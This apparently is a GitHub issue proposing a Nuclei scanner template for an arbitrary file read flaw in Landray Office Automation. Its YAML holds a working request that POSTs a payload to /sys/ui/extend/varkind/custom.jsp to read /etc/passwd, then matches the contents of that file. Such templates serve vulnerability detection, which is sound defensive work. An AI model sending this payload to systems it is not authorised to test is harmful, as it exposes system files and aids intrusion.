### ISSUE TITLE
[nuclei-template] Landray Office automation File Read

### ISSUE THREAD

**Issue by shifa123** [projectdiscovery/nuclei-templates#1399]
**Template Details** 
Shenzhen Lanling Software Co., Ltd. digital Office Automation has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.

```yaml

--- 
id: landray-office-automation-fileread
info: 
  author: "shifacyclewala, hackergautam"
  name: "Landray Office automation File Read"
  reference: "https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw"
  severity: high
  tags: "landray,lfi"
requests: 
  - 
    body: "var={\"body\":{\"file\":\"file:///etc/passwd\"}}"
    matchers: 
      - 
        part: body
        regex: 
          - "root:[x*]:0:0"
        type: regex
      - 
        status: 
          - 200
        type: status
    matchers-condition: and
    method: POST
    path: 
      - "{{BaseURL}}/sys/ui/extend/varkind/custom.jsp"

```

Exploit Source : https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
Twitter : https://twitter.com/sec715/status/1388713517998477317
